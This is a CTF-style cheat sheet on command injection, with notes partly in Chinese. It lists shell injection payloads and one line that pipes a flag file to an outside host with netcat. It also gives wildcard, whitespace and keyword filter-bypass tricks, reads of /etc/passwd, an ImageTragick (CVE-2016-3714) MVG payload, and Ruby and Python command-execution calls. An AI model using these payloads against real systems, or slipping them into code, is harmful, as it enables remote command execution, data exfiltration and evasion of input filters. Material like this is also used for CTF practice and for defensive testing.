Command Injection

| cat flag
&& cat flag
; cat flag
%0a cat flag
"; cat flag
`cat flag`
cat $(ls)
"; cat $(ls)
`cat flag | nc kaibro.tw 5278`

. flag
PS1=$(cat flag)

? and *

  • ? match one character
    • cat fl?g
    • /???/??t /???/p??s??
  • * match 多個
    • cat f*
    • cat f?a*

空白繞過

  • ${IFS}
    • cat${IFS}flag
    • ls$IFS-alh
    • cat$IFS$2flag
  • cat</etc/passwd
  • {cat,/etc/passwd}
  • X=$'cat\x20/etc/passwd'&&$X
  • IFS=,;`cat<<<uname,-a`
    • bash only

Keyword繞過

  • String Concat

    • A=fl;B=ag;cat $A$B

  • Empty Variable

    • cat fl${x}ag
    • cat tes$(z)t/flag

  • Environment Variable

    • $PATH => "/usr/local/….blablabla”
      • ${PATH:0:1} => '/'
      • ${PATH:1:1} => 'u'
      • ${PATH:0:4} => '/usr'

  • Empty String

    • cat fl""ag
    • cat fl''ag
      • cat "fl""ag"

ImageMagick (ImageTragick)

  • CVE-2016-3714
  • mvg格式包含https處理(使用curl下載),可以閉合雙引號
  • payload:
push graphic-context
viewbox 0 0 640 480
fill 'url(https://kaibro.tw";ls "-la)'
pop graphic-context

Ruby Command Executing

  • open("| ls")
  • IO.popen("ls").read
  • Kernel.exec("ls")
  • `ls`
  • system("ls")
  • eval("ruby code")
    • Non-Alphanumeric example: HITCON CTF 2015 - Hard to say
      • $$/$$ => 1
      • '' << 97 << 98 << 99 => "abc"
      • $:$LOAD_PATH
  • exec("ls")
  • %x{ls}
  • Net::FTP
    • CVE-2017-17405
    • use Kernel#open

Python Command Executing

  • os.system("ls")
  • os.popen("ls").read()
  • os.execl("/bin/ls","")
  • os.execlp("ls","")
  • os.execv("/bin/ls",[''])
  • os.execvp("/bin/ls",[""])
  • subprocess.call("ls")
    • subprocess.call("ls|cat",shell=False) => Fail
    • subprocess.call("ls|cat",shell=True) => Correct
  • eval("__import__('os').system('ls')")
  • exec("__import__('os').system('ls')")
  • commands.getoutput('ls')